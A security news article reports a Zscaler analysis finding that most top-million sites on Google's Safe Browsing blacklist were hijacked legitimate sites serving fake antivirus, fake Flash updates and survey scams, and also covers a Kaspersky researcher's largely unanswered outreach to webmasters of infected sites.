Google Blacklist Includes Hijacked Websites

Many of the Websites blacklisted by Google are actually legitimate Websites that have been hijacked to serve up malware, according to security firm Zscaler.

Zscaler's Julien Sobrier analyzed Alexa's list of the top one million Websites and found 621 were also identified as malicious on Google's Safe Browsing blacklist. Sobrier found that of the 621 sites, most of them were legitimate Web sites that had been hijacked and were serving up malicious content such as fake antivirus and booby-trapped PDF files without the site owner's knowledge.

Major Web browsers, including Mozilla Firefox, Apple's Safari, and Google Chrome use the blacklist to prevent users using Google's search engine from clicking on links to flagged Websites. Browsers that use Safe Browsing display a warning screen informing users to not visit the bocked sites. Microsoft's Internet Explorer and Opera does not use Safe Browsing at this time.

"No site is safe from hijacking," Sobrier wrote. "Personal websites and top-10,000 sites are all likely to be infected at some point."

Attack TypesAccording to Sobrier's analysis, the attackers usually modified the compromised page to run JavaScript code to redirect to a malicious site or to open an iFrame containing malicious content hosted elsewhere on the Web. Users are being redirected to the "same type of malicious pages that we've seen for years now, such as fake AV scareware, fake Flash updates, survey scams, etc," Sobrier wrote in a follow-up post on the ThreatLabZ blog May 18.

"That means that users are still not educated enough to recognize fake software updates and still fall for the same old tricks," he added.

Several of the sites displayed a page that "looks a lot like YouTube" and urged visitors to upgrade their installation of Adobe Flash in order to view a scintillating video. Others displayed an image or a pop-up window claiming the computer was already infected with malware and urging users to download an antivirus to clean up the problem. Finally, Sobrier identified sites tricking users into signing up for "free" trials or gifts by filling out pages and pages of online surveys.

"This type of scam [surveys] is very, very common. It's amazing that is [sic] still works," Sobrier wrote.

Sobrier noted that Safe Browsing blocked the entire site that contained the attack JavaScript code or the iFRAME instead of the actual domain containing malware. This was a problem because the original source was still free to serve up its malicious payload to unsuspecting visitors. A site that had been hacked, but not yet blacklisted by Safe Browsing, would impact users so long as the malicious domain remained unblocked.

Webmasters Need to Pay AttentionWebmasters must be vigilant, accordign to Sobrier. Considering Alexa ranked sites by traffic, Webmasters should have noticed a significant drop in their traffic shortly after the compromise and being blacklisted. Only IE and Opera users would be visiting the site from search engines, a fact that should be readily apparent if the Webmaster was checking the logs. They should be investing in products to detect traffic anomalies, getting blacklisted, or to scan the site for malicious code.

"Owners of these very popular websites have not invested in keeping their website safe," Sobrier said, calling his findings "disappointing."

Sobrier's findings echo a similar project by Kaspersky Lab's Stefan Tanase earlier this year. Tanase had emailed Webmasters of 100 websites infected with malware informing them of the problem. In his note, he provided some information about how the infection may have occurred, such as a weak FTP password allowing hackers to upload a malicious script, or modify an existing file. In return, he asked for some data on the infections in the form of log entries. When no one responded to his request, he reached out to another 200, and finally got six replies.

One of the responses was from a Webmaster who was no longer actively maintaining the site because it was part of an older project and was no longer in use, Tanase said during his presentation at the Kaspersky Lab Security Analyst Summit in February.

"The assumption I made is that webmasters don’t know their sites are infected," Tanase said. "The reality is that webmasters don’t care if their sites are infected."

Automatic Renewal Program: Your subscription will continue without interruption for as long as you wish, unless
you instruct us otherwise. Your subscription will automatically renew at the end of the term unless you authorize
cancellation. Each year, you'll receive a notice and you authorize that your credit/debit card will be charged the
annual subscription rate(s). You may cancel at any time during your subscription and receive a full refund on all
unsent issues. If your credit/debit card or other billing method can not be charged, we will bill you directly instead. Contact Customer Service